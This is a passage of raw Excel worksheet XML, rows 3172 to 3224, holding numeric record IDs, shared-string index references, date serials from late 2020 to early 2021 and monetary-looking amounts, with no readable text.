      </c>
      <c r="B3172">
        <v>5010</v>
      </c>
      <c r="C3172" t="s">
        <v>7983</v>
      </c>
      <c r="D3172" t="s">
        <v>11717</v>
      </c>
      <c r="E3172">
        <v>11</v>
      </c>
      <c r="F3172" t="s">
        <v>12468</v>
      </c>
      <c r="G3172" s="1">
        <v>44160</v>
      </c>
      <c r="H3172">
        <v>100000</v>
      </c>
      <c r="J3172" t="s">
        <v>12467</v>
      </c>
    </row>
    <row r="3173" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3173">
        <v>23164</v>
      </c>
      <c r="B3173">
        <v>658</v>
      </c>
      <c r="C3173" t="s">
        <v>1846</v>
      </c>
      <c r="D3173" t="s">
        <v>12284</v>
      </c>
      <c r="E3173">
        <v>24</v>
      </c>
      <c r="F3173" t="s">
        <v>609</v>
      </c>
      <c r="G3173" s="1">
        <v>44258</v>
      </c>
      <c r="H3173">
        <v>1800</v>
      </c>
      <c r="I3173" t="s">
        <v>9485</v>
      </c>
      <c r="J3173" t="s">
        <v>9752</v>
      </c>
    </row>
    <row r="3174" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3174">
        <v>23166</v>
      </c>
      <c r="B3174">
        <v>19</v>
      </c>
      <c r="C3174" t="s">
        <v>16311</v>
      </c>
      <c r="D3174" t="s">
        <v>16481</v>
      </c>
      <c r="E3174">
        <v>22</v>
      </c>
      <c r="F3174" t="s">
        <v>10463</v>
      </c>
      <c r="G3174" s="1">
        <v>44358</v>
      </c>
      <c r="H3174" s="4">
        <v>10000</v>
      </c>
      <c r="J3174" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3175" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3175">
        <v>23167</v>
      </c>
      <c r="B3175">
        <v>19</v>
      </c>
      <c r="C3175" t="s">
        <v>735</v>
      </c>
      <c r="D3175" t="s">
        <v>12469</v>
      </c>
      <c r="E3175">
        <v>22</v>
      </c>
      <c r="F3175" t="s">
        <v>12470</v>
      </c>
      <c r="G3175" s="1">
        <v>44358</v>
      </c>
      <c r="H3175">
        <v>10000</v>
      </c>
      <c r="J3175" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="3176" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3176">
        <v>23168</v>
      </c>
      <c r="B3176">
        <v>19</v>
      </c>
      <c r="C3176" t="s">
        <v>735</v>
      </c>
      <c r="D3176" t="s">
        <v>12469</v>
      </c>
      <c r="E3176">
        <v>22</v>
      </c>
      <c r="F3176" t="s">
        <v>12471</v>
      </c>
      <c r="G3176" s="1">
        <v>44358</v>
      </c>
      <c r="H3176">
        <v>10000</v>
      </c>
      <c r="J3176" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="3177" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3177">
        <v>23171</v>
      </c>
      <c r="B3177">
        <v>1365</v>
      </c>
      <c r="C3177" t="s">
        <v>3848</v>
      </c>
      <c r="D3177" t="s">
        <v>12472</v>
      </c>
      <c r="E3177">
        <v>12</v>
      </c>
      <c r="F3177" t="s">
        <v>2236</v>
      </c>
      <c r="G3177" s="1">
        <v>44202</v>
      </c>
      <c r="H3177">
        <v>500000</v>
      </c>
      <c r="I3177" t="s">
        <v>12473</v>
      </c>
      <c r="J3177" t="s">
        <v>12474</v>
      </c>
    </row>
    <row r="3178" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3178">
        <v>23173</v>
      </c>
      <c r="B3178">
        <v>1365</v>
      </c>
      <c r="C3178" t="s">
        <v>3848</v>
      </c>
      <c r="D3178" t="s">
        <v>12472</v>
      </c>
      <c r="E3178">
        <v>12</v>
      </c>
      <c r="F3178" t="s">
        <v>9437</v>
      </c>
      <c r="G3178" s="1">
        <v>44202</v>
      </c>
      <c r="H3178">
        <v>10000</v>
      </c>
      <c r="I3178" t="s">
        <v>12475</v>
      </c>
    </row>
    <row r="3179" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3179">
        <v>23174</v>
      </c>
      <c r="B3179">
        <v>1365</v>
      </c>
      <c r="C3179" t="s">
        <v>3848</v>
      </c>
      <c r="D3179" t="s">
        <v>12472</v>
      </c>
      <c r="E3179">
        <v>12</v>
      </c>
      <c r="F3179" t="s">
        <v>12476</v>
      </c>
      <c r="G3179" s="1">
        <v>44202</v>
      </c>
      <c r="H3179">
        <v>750000</v>
      </c>
      <c r="I3179" t="s">
        <v>12475</v>
      </c>
      <c r="J3179" t="s">
        <v>12474</v>
      </c>
    </row>
    <row r="3180" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3180">
        <v>23175</v>
      </c>
      <c r="B3180">
        <v>1365</v>
      </c>
      <c r="C3180" t="s">
        <v>3848</v>
      </c>
      <c r="D3180" t="s">
        <v>12472</v>
      </c>
      <c r="E3180">
        <v>12</v>
      </c>
      <c r="F3180" t="s">
        <v>12477</v>
      </c>
      <c r="G3180" s="1">
        <v>44202</v>
      </c>
      <c r="H3180">
        <v>50000</v>
      </c>
      <c r="I3180" t="s">
        <v>12475</v>
      </c>
      <c r="J3180" t="s">
        <v>12474</v>
      </c>
    </row>
    <row r="3181" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3181">
        <v>23176</v>
      </c>
      <c r="B3181">
        <v>5093</v>
      </c>
      <c r="C3181" t="s">
        <v>8029</v>
      </c>
      <c r="D3181" t="s">
        <v>12478</v>
      </c>
      <c r="E3181">
        <v>32</v>
      </c>
      <c r="F3181" t="s">
        <v>10589</v>
      </c>
      <c r="G3181" s="1">
        <v>44154</v>
      </c>
      <c r="H3181" t="s">
        <v>16581</v>
      </c>
      <c r="I3181" t="s">
        <v>12479</v>
      </c>
    </row>
    <row r="3182" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3182">
        <v>23178</v>
      </c>
      <c r="B3182">
        <v>480</v>
      </c>
      <c r="C3182" t="s">
        <v>1866</v>
      </c>
      <c r="D3182" t="s">
        <v>11842</v>
      </c>
      <c r="E3182">
        <v>16</v>
      </c>
      <c r="F3182" t="s">
        <v>10130</v>
      </c>
      <c r="G3182" s="1">
        <v>44154</v>
      </c>
      <c r="H3182">
        <v>0</v>
      </c>
      <c r="J3182" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="3183" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3183">
        <v>23179</v>
      </c>
      <c r="B3183">
        <v>480</v>
      </c>
      <c r="C3183" t="s">
        <v>1866</v>
      </c>
      <c r="D3183" t="s">
        <v>11842</v>
      </c>
      <c r="E3183">
        <v>16</v>
      </c>
      <c r="F3183" t="s">
        <v>9681</v>
      </c>
      <c r="G3183" s="1">
        <v>44154</v>
      </c>
      <c r="H3183">
        <v>1000</v>
      </c>
      <c r="J3183" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="3184" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3184">
        <v>23181</v>
      </c>
      <c r="B3184">
        <v>34</v>
      </c>
      <c r="C3184" t="s">
        <v>2097</v>
      </c>
      <c r="D3184" t="s">
        <v>12480</v>
      </c>
      <c r="E3184">
        <v>12</v>
      </c>
      <c r="F3184" t="s">
        <v>2236</v>
      </c>
      <c r="G3184" s="1">
        <v>44165</v>
      </c>
      <c r="H3184">
        <v>150000</v>
      </c>
      <c r="J3184" t="s">
        <v>12481</v>
      </c>
    </row>
    <row r="3185" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3185">
        <v>23183</v>
      </c>
      <c r="B3185">
        <v>34</v>
      </c>
      <c r="C3185" t="s">
        <v>2097</v>
      </c>
      <c r="D3185" t="s">
        <v>12480</v>
      </c>
      <c r="E3185">
        <v>12</v>
      </c>
      <c r="F3185" t="s">
        <v>4686</v>
      </c>
      <c r="G3185" s="1">
        <v>44165</v>
      </c>
      <c r="H3185">
        <v>0</v>
      </c>
      <c r="J3185" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3186" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3186">
        <v>23184</v>
      </c>
      <c r="B3186">
        <v>34</v>
      </c>
      <c r="C3186" t="s">
        <v>2097</v>
      </c>
      <c r="D3186" t="s">
        <v>12480</v>
      </c>
      <c r="E3186">
        <v>12</v>
      </c>
      <c r="F3186" t="s">
        <v>12482</v>
      </c>
      <c r="G3186" s="1">
        <v>44165</v>
      </c>
      <c r="H3186">
        <v>0</v>
      </c>
      <c r="I3186" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="3187" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3187">
        <v>23185</v>
      </c>
      <c r="B3187">
        <v>34</v>
      </c>
      <c r="C3187" t="s">
        <v>2097</v>
      </c>
      <c r="D3187" t="s">
        <v>12480</v>
      </c>
      <c r="E3187">
        <v>12</v>
      </c>
      <c r="F3187" t="s">
        <v>9437</v>
      </c>
      <c r="G3187" s="1">
        <v>44165</v>
      </c>
      <c r="H3187">
        <v>0</v>
      </c>
      <c r="I3187" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="3188" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3188">
        <v>23186</v>
      </c>
      <c r="B3188">
        <v>1380</v>
      </c>
      <c r="C3188" t="s">
        <v>3864</v>
      </c>
      <c r="D3188" t="s">
        <v>12483</v>
      </c>
      <c r="E3188">
        <v>3</v>
      </c>
      <c r="F3188" t="s">
        <v>7114</v>
      </c>
      <c r="G3188" s="1">
        <v>44151</v>
      </c>
      <c r="H3188">
        <v>600</v>
      </c>
      <c r="I3188" t="s">
        <v>12484</v>
      </c>
    </row>
    <row r="3189" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3189">
        <v>23187</v>
      </c>
      <c r="B3189">
        <v>1380</v>
      </c>
      <c r="C3189" t="s">
        <v>3864</v>
      </c>
      <c r="D3189" t="s">
        <v>12483</v>
      </c>
      <c r="E3189">
        <v>3</v>
      </c>
      <c r="F3189" t="s">
        <v>12485</v>
      </c>
      <c r="G3189" s="1">
        <v>44151</v>
      </c>
      <c r="H3189">
        <v>300</v>
      </c>
      <c r="I3189" t="s">
        <v>12484</v>
      </c>
    </row>
    <row r="3190" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3190">
        <v>23188</v>
      </c>
      <c r="B3190">
        <v>1380</v>
      </c>
      <c r="C3190" t="s">
        <v>3864</v>
      </c>
      <c r="D3190" t="s">
        <v>12483</v>
      </c>
      <c r="E3190">
        <v>3</v>
      </c>
      <c r="F3190" t="s">
        <v>11351</v>
      </c>
      <c r="G3190" s="1">
        <v>44151</v>
      </c>
      <c r="H3190">
        <v>240</v>
      </c>
      <c r="I3190" t="s">
        <v>12484</v>
      </c>
    </row>
    <row r="3191" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3191">
        <v>23189</v>
      </c>
      <c r="B3191">
        <v>1380</v>
      </c>
      <c r="C3191" t="s">
        <v>3864</v>
      </c>
      <c r="D3191" t="s">
        <v>12483</v>
      </c>
      <c r="E3191">
        <v>3</v>
      </c>
      <c r="F3191" t="s">
        <v>12486</v>
      </c>
      <c r="G3191" s="1">
        <v>44151</v>
      </c>
      <c r="H3191">
        <v>120</v>
      </c>
      <c r="I3191" t="s">
        <v>12484</v>
      </c>
    </row>
    <row r="3192" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3192">
        <v>23190</v>
      </c>
      <c r="B3192">
        <v>469</v>
      </c>
      <c r="C3192" t="s">
        <v>1626</v>
      </c>
      <c r="D3192" t="s">
        <v>11336</v>
      </c>
      <c r="E3192">
        <v>12</v>
      </c>
      <c r="F3192" t="s">
        <v>10130</v>
      </c>
      <c r="G3192" s="1">
        <v>44162</v>
      </c>
      <c r="H3192">
        <v>5000</v>
      </c>
      <c r="J3192" t="s">
        <v>12487</v>
      </c>
    </row>
    <row r="3193" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3193">
        <v>23191</v>
      </c>
      <c r="B3193">
        <v>469</v>
      </c>
      <c r="C3193" t="s">
        <v>1626</v>
      </c>
      <c r="D3193" t="s">
        <v>11336</v>
      </c>
      <c r="E3193">
        <v>12</v>
      </c>
      <c r="F3193" t="s">
        <v>11419</v>
      </c>
      <c r="G3193" s="1">
        <v>44162</v>
      </c>
      <c r="H3193">
        <v>5000</v>
      </c>
      <c r="I3193" t="s">
        <v>12488</v>
      </c>
    </row>
    <row r="3194" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3194">
        <v>23192</v>
      </c>
      <c r="B3194">
        <v>469</v>
      </c>
      <c r="C3194" t="s">
        <v>1626</v>
      </c>
      <c r="D3194" t="s">
        <v>11336</v>
      </c>
      <c r="E3194">
        <v>12</v>
      </c>
      <c r="F3194" t="s">
        <v>9532</v>
      </c>
      <c r="G3194" s="1">
        <v>44162</v>
      </c>
      <c r="H3194">
        <v>5000</v>
      </c>
      <c r="I3194" t="s">
        <v>12488</v>
      </c>
    </row>
    <row r="3195" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3195">
        <v>23193</v>
      </c>
      <c r="B3195">
        <v>4804</v>
      </c>
      <c r="C3195" t="s">
        <v>8014</v>
      </c>
      <c r="D3195" t="s">
        <v>12489</v>
      </c>
      <c r="E3195">
        <v>16</v>
      </c>
      <c r="F3195" t="s">
        <v>12490</v>
      </c>
      <c r="G3195" s="1">
        <v>44218</v>
      </c>
      <c r="H3195">
        <v>80000</v>
      </c>
      <c r="I3195" t="s">
        <v>12491</v>
      </c>
    </row>
    <row r="3196" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3196">
        <v>23194</v>
      </c>
      <c r="B3196">
        <v>4804</v>
      </c>
      <c r="C3196" t="s">
        <v>8014</v>
      </c>
      <c r="D3196" t="s">
        <v>12489</v>
      </c>
      <c r="E3196">
        <v>16</v>
      </c>
      <c r="F3196" t="s">
        <v>12492</v>
      </c>
      <c r="G3196" s="1">
        <v>44218</v>
      </c>
      <c r="H3196">
        <v>80000</v>
      </c>
      <c r="I3196" t="s">
        <v>12491</v>
      </c>
    </row>
    <row r="3197" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3197">
        <v>23197</v>
      </c>
      <c r="B3197">
        <v>1028</v>
      </c>
      <c r="C3197" t="s">
        <v>2780</v>
      </c>
      <c r="D3197" t="s">
        <v>9760</v>
      </c>
      <c r="E3197">
        <v>16</v>
      </c>
      <c r="F3197" t="s">
        <v>12493</v>
      </c>
      <c r="G3197" s="1">
        <v>44211</v>
      </c>
      <c r="H3197">
        <v>600000</v>
      </c>
      <c r="J3197" t="s">
        <v>11427</v>
      </c>
    </row>
    <row r="3198" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3198">
        <v>23198</v>
      </c>
      <c r="B3198">
        <v>1234</v>
      </c>
      <c r="C3198" t="s">
        <v>3833</v>
      </c>
      <c r="D3198" t="s">
        <v>12494</v>
      </c>
      <c r="E3198">
        <v>12</v>
      </c>
      <c r="F3198" t="s">
        <v>12495</v>
      </c>
      <c r="G3198" s="1">
        <v>44169</v>
      </c>
      <c r="H3198">
        <v>195000</v>
      </c>
      <c r="I3198" t="s">
        <v>12496</v>
      </c>
      <c r="J3198" t="s">
        <v>12497</v>
      </c>
    </row>
    <row r="3199" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3199">
        <v>23199</v>
      </c>
      <c r="B3199">
        <v>1234</v>
      </c>
      <c r="C3199" t="s">
        <v>3833</v>
      </c>
      <c r="D3199" t="s">
        <v>12494</v>
      </c>
      <c r="E3199">
        <v>12</v>
      </c>
      <c r="F3199" t="s">
        <v>12498</v>
      </c>
      <c r="G3199" s="1">
        <v>44169</v>
      </c>
      <c r="H3199">
        <v>170000</v>
      </c>
      <c r="I3199" t="s">
        <v>12499</v>
      </c>
      <c r="J3199" t="s">
        <v>12497</v>
      </c>
    </row>
    <row r="3200" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3200">
        <v>23200</v>
      </c>
      <c r="B3200">
        <v>1234</v>
      </c>
      <c r="C3200" t="s">
        <v>3833</v>
      </c>
      <c r="D3200" t="s">
        <v>12494</v>
      </c>
      <c r="E3200">
        <v>12</v>
      </c>
      <c r="F3200" t="s">
        <v>9437</v>
      </c>
      <c r="G3200" s="1">
        <v>44169</v>
      </c>
      <c r="H3200">
        <v>125000</v>
      </c>
      <c r="I3200" t="s">
        <v>12500</v>
      </c>
      <c r="J3200" t="s">
        <v>12497</v>
      </c>
    </row>
    <row r="3201" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3201">
        <v>23201</v>
      </c>
      <c r="B3201">
        <v>1234</v>
      </c>
      <c r="C3201" t="s">
        <v>3833</v>
      </c>
      <c r="D3201" t="s">
        <v>12494</v>
      </c>
      <c r="E3201">
        <v>12</v>
      </c>
      <c r="F3201" t="s">
        <v>2236</v>
      </c>
      <c r="G3201" s="1">
        <v>44169</v>
      </c>
      <c r="H3201">
        <v>125000</v>
      </c>
      <c r="I3201" t="s">
        <v>12501</v>
      </c>
      <c r="J3201" t="s">
        <v>12502</v>
      </c>
    </row>
    <row r="3202" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3202">
        <v>23206</v>
      </c>
      <c r="B3202">
        <v>1000</v>
      </c>
      <c r="C3202" t="s">
        <v>3012</v>
      </c>
      <c r="D3202" t="s">
        <v>12503</v>
      </c>
      <c r="E3202">
        <v>4</v>
      </c>
      <c r="F3202" t="s">
        <v>7057</v>
      </c>
      <c r="G3202" s="1">
        <v>44181</v>
      </c>
      <c r="H3202">
        <v>5000</v>
      </c>
      <c r="J3202" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3203" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3203">
        <v>23207</v>
      </c>
      <c r="B3203">
        <v>1000</v>
      </c>
      <c r="C3203" t="s">
        <v>3012</v>
      </c>
      <c r="D3203" t="s">
        <v>12503</v>
      </c>
      <c r="E3203">
        <v>4</v>
      </c>
      <c r="F3203" t="s">
        <v>12504</v>
      </c>
      <c r="G3203" s="1">
        <v>44181</v>
      </c>
      <c r="H3203">
        <v>500000</v>
      </c>
      <c r="J3203" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3204" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3204">
        <v>23208</v>
      </c>
      <c r="B3204">
        <v>174</v>
      </c>
      <c r="C3204" t="s">
        <v>1828</v>
      </c>
      <c r="D3204" t="s">
        <v>11710</v>
      </c>
      <c r="E3204">
        <v>13</v>
      </c>
      <c r="F3204" t="s">
        <v>10827</v>
      </c>
      <c r="G3204" s="1">
        <v>44162</v>
      </c>
      <c r="H3204">
        <v>0</v>
      </c>
      <c r="J3204" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3205" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3205">
        <v>23209</v>
      </c>
      <c r="B3205">
        <v>174</v>
      </c>
      <c r="C3205" t="s">
        <v>1828</v>
      </c>
      <c r="D3205" t="s">
        <v>11710</v>
      </c>
      <c r="E3205">
        <v>13</v>
      </c>
      <c r="F3205" t="s">
        <v>1030</v>
      </c>
      <c r="G3205" s="1">
        <v>44162</v>
      </c>
      <c r="H3205">
        <v>0</v>
      </c>
      <c r="J3205" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3206" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3206">
        <v>23210</v>
      </c>
      <c r="B3206">
        <v>5034</v>
      </c>
      <c r="C3206" t="s">
        <v>7976</v>
      </c>
      <c r="D3206" t="s">
        <v>12505</v>
      </c>
      <c r="E3206">
        <v>4</v>
      </c>
      <c r="F3206" t="s">
        <v>12506</v>
      </c>
      <c r="G3206" s="1">
        <v>44188</v>
      </c>
      <c r="H3206">
        <v>10000</v>
      </c>
      <c r="J3206" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3207" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3207">
        <v>23211</v>
      </c>
      <c r="B3207">
        <v>5034</v>
      </c>
      <c r="C3207" t="s">
        <v>7976</v>
      </c>
      <c r="D3207" t="s">
        <v>12505</v>
      </c>
      <c r="E3207">
        <v>4</v>
      </c>
      <c r="F3207" t="s">
        <v>12413</v>
      </c>
      <c r="G3207" s="1">
        <v>44188</v>
      </c>
      <c r="H3207">
        <v>15000</v>
      </c>
      <c r="J3207" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3208" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3208">
        <v>23212</v>
      </c>
      <c r="B3208">
        <v>5034</v>
      </c>
      <c r="C3208" t="s">
        <v>7976</v>
      </c>
      <c r="D3208" t="s">
        <v>12505</v>
      </c>
      <c r="E3208">
        <v>4</v>
      </c>
      <c r="F3208" t="s">
        <v>7057</v>
      </c>
      <c r="G3208" s="1">
        <v>44188</v>
      </c>
      <c r="H3208">
        <v>5000</v>
      </c>
      <c r="J3208" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3209" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3209">
        <v>23213</v>
      </c>
      <c r="B3209">
        <v>5034</v>
      </c>
      <c r="C3209" t="s">
        <v>7976</v>
      </c>
      <c r="D3209" t="s">
        <v>12505</v>
      </c>
      <c r="E3209">
        <v>4</v>
      </c>
      <c r="F3209" t="s">
        <v>3814</v>
      </c>
      <c r="G3209" s="1">
        <v>44188</v>
      </c>
      <c r="H3209">
        <v>30000</v>
      </c>
      <c r="J3209" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3210" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3210">
        <v>23214</v>
      </c>
      <c r="B3210">
        <v>678</v>
      </c>
      <c r="C3210" t="s">
        <v>2103</v>
      </c>
      <c r="D3210" t="s">
        <v>12507</v>
      </c>
      <c r="E3210">
        <v>17</v>
      </c>
      <c r="F3210" t="s">
        <v>2105</v>
      </c>
      <c r="G3210" s="1">
        <v>44181</v>
      </c>
      <c r="H3210">
        <v>1500000</v>
      </c>
      <c r="I3210" t="s">
        <v>12508</v>
      </c>
    </row>
    <row r="3211" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3211">
        <v>23218</v>
      </c>
      <c r="B3211">
        <v>456</v>
      </c>
      <c r="C3211" t="s">
        <v>2112</v>
      </c>
      <c r="D3211" t="s">
        <v>12509</v>
      </c>
      <c r="E3211">
        <v>12</v>
      </c>
      <c r="F3211" t="s">
        <v>2236</v>
      </c>
      <c r="G3211" s="1">
        <v>44260</v>
      </c>
      <c r="H3211">
        <v>1188000</v>
      </c>
      <c r="J3211" t="s">
        <v>12510</v>
      </c>
    </row>
    <row r="3212" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3212">
        <v>23219</v>
      </c>
      <c r="B3212">
        <v>456</v>
      </c>
      <c r="C3212" t="s">
        <v>2112</v>
      </c>
      <c r="D3212" t="s">
        <v>12509</v>
      </c>
      <c r="E3212">
        <v>12</v>
      </c>
      <c r="F3212" t="s">
        <v>4686</v>
      </c>
      <c r="G3212" s="1">
        <v>44260</v>
      </c>
      <c r="H3212">
        <v>5000</v>
      </c>
      <c r="J3212" t="s">
        <v>12510</v>
      </c>
    </row>
    <row r="3213" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3213">
        <v>23220</v>
      </c>
      <c r="B3213">
        <v>456</v>
      </c>
      <c r="C3213" t="s">
        <v>2112</v>
      </c>
      <c r="D3213" t="s">
        <v>12509</v>
      </c>
      <c r="E3213">
        <v>12</v>
      </c>
      <c r="F3213" t="s">
        <v>12511</v>
      </c>
      <c r="G3213" s="1">
        <v>44260</v>
      </c>
      <c r="H3213">
        <v>0</v>
      </c>
      <c r="J3213" t="s">
        <v>12510</v>
      </c>
    </row>
    <row r="3214" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3214">
        <v>23221</v>
      </c>
      <c r="B3214">
        <v>456</v>
      </c>
      <c r="C3214" t="s">
        <v>2112</v>
      </c>
      <c r="D3214" t="s">
        <v>12509</v>
      </c>
      <c r="E3214">
        <v>12</v>
      </c>
      <c r="F3214" t="s">
        <v>9437</v>
      </c>
      <c r="G3214" s="1">
        <v>44260</v>
      </c>
      <c r="H3214">
        <v>0</v>
      </c>
      <c r="J3214" t="s">
        <v>12510</v>
      </c>
    </row>
    <row r="3215" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3215">
        <v>23222</v>
      </c>
      <c r="B3215">
        <v>5011</v>
      </c>
      <c r="C3215" t="s">
        <v>8061</v>
      </c>
      <c r="D3215" t="s">
        <v>12512</v>
      </c>
      <c r="E3215">
        <v>9</v>
      </c>
      <c r="F3215" t="s">
        <v>1276</v>
      </c>
      <c r="G3215" s="1">
        <v>44188</v>
      </c>
      <c r="H3215">
        <v>5000</v>
      </c>
      <c r="I3215" t="s">
        <v>12513</v>
      </c>
    </row>
    <row r="3216" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3216">
        <v>23223</v>
      </c>
      <c r="B3216">
        <v>5090</v>
      </c>
      <c r="C3216" t="s">
        <v>8068</v>
      </c>
      <c r="D3216" t="s">
        <v>12514</v>
      </c>
      <c r="E3216">
        <v>22</v>
      </c>
      <c r="F3216" t="s">
        <v>12515</v>
      </c>
      <c r="G3216" s="1">
        <v>44291</v>
      </c>
      <c r="H3216">
        <v>20000</v>
      </c>
      <c r="J3216" t="s">
        <v>12516</v>
      </c>
    </row>
    <row r="3217" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3217">
        <v>23224</v>
      </c>
      <c r="B3217">
        <v>5090</v>
      </c>
      <c r="C3217" t="s">
        <v>8068</v>
      </c>
      <c r="D3217" t="s">
        <v>12514</v>
      </c>
      <c r="E3217">
        <v>22</v>
      </c>
      <c r="F3217" t="s">
        <v>12517</v>
      </c>
      <c r="G3217" s="1">
        <v>44291</v>
      </c>
      <c r="H3217">
        <v>30000</v>
      </c>
      <c r="J3217" t="s">
        <v>12516</v>
      </c>
    </row>
    <row r="3218" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3218">
        <v>23225</v>
      </c>
      <c r="B3218">
        <v>5090</v>
      </c>
      <c r="C3218" t="s">
        <v>8068</v>
      </c>
      <c r="D3218" t="s">
        <v>12514</v>
      </c>
      <c r="E3218">
        <v>22</v>
      </c>
      <c r="F3218" t="s">
        <v>9640</v>
      </c>
      <c r="G3218" s="1">
        <v>44291</v>
      </c>
      <c r="H3218">
        <v>50000</v>
      </c>
      <c r="J3218" t="s">
        <v>12516</v>
      </c>
    </row>
    <row r="3219" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3219">
        <v>23226</v>
      </c>
      <c r="B3219">
        <v>5090</v>
      </c>
      <c r="C3219" t="s">
        <v>8068</v>
      </c>
      <c r="D3219" t="s">
        <v>12514</v>
      </c>
      <c r="E3219">
        <v>22</v>
      </c>
      <c r="F3219" t="s">
        <v>3814</v>
      </c>
      <c r="G3219" s="1">
        <v>44291</v>
      </c>
      <c r="H3219">
        <v>20000</v>
      </c>
      <c r="J3219" t="s">
        <v>12516</v>
      </c>
    </row>
    <row r="3220" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3220">
        <v>23227</v>
      </c>
      <c r="B3220">
        <v>5090</v>
      </c>
      <c r="C3220" t="s">
        <v>8068</v>
      </c>
      <c r="D3220" t="s">
        <v>12514</v>
      </c>
      <c r="E3220">
        <v>22</v>
      </c>
      <c r="F3220" t="s">
        <v>5434</v>
      </c>
      <c r="G3220" s="1">
        <v>44291</v>
      </c>
      <c r="H3220">
        <v>20000</v>
      </c>
      <c r="J3220" t="s">
        <v>12516</v>
      </c>
    </row>
    <row r="3221" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3221">
        <v>23228</v>
      </c>
      <c r="B3221">
        <v>5090</v>
      </c>
      <c r="C3221" t="s">
        <v>8068</v>
      </c>
      <c r="D3221" t="s">
        <v>12514</v>
      </c>
      <c r="E3221">
        <v>22</v>
      </c>
      <c r="F3221" t="s">
        <v>7613</v>
      </c>
      <c r="G3221" s="1">
        <v>44291</v>
      </c>
      <c r="H3221">
        <v>50000</v>
      </c>
      <c r="J3221" t="s">
        <v>12516</v>
      </c>
    </row>
    <row r="3222" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3222">
        <v>23230</v>
      </c>
      <c r="B3222">
        <v>1000</v>
      </c>
      <c r="C3222" t="s">
        <v>3012</v>
      </c>
      <c r="D3222" t="s">
        <v>12503</v>
      </c>
      <c r="E3222">
        <v>4</v>
      </c>
      <c r="F3222" t="s">
        <v>12518</v>
      </c>
      <c r="G3222" s="1">
        <v>44181</v>
      </c>
      <c r="H3222">
        <v>700000</v>
      </c>
      <c r="J3222" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3223" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3223">
        <v>23231</v>
      </c>
      <c r="B3223">
        <v>5095</v>
      </c>
      <c r="C3223" t="s">
        <v>8043</v>
      </c>
      <c r="D3223" t="s">
        <v>12519</v>
      </c>
      <c r="E3223">
        <v>11</v>
      </c>
      <c r="F3223" t="s">
        <v>9217</v>
      </c>
      <c r="G3223" s="1">
        <v>44200</v>
      </c>
      <c r="H3223">
        <v>1000</v>
      </c>
      <c r="J3223" t="s">
        <v>10497</v>
      </c>
    </row>
    <row r="3224" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3224">
        <v>23232</v>
      </c>
      <c r="B3224">
        <v>5095</v>
      </c>
      <c r="C3224" t="s">
        <v>8043</v>
      </c>
      <c r="D3224" t="s">
        <v>12519</v>
      </c>
      <c r="E3224">
        <v>11</v>
      </c>
      <c r="F3224" t="s">
        <v>9454</v>
      </c>
      <c r="G3224" s="1">
        <v>44200</v>
      </c>
      <c r="H3224">
        <v>1000</v>
      </c>
      <c r="J3224" t="s">
        <v>11207</v>
      </c>
    </row>
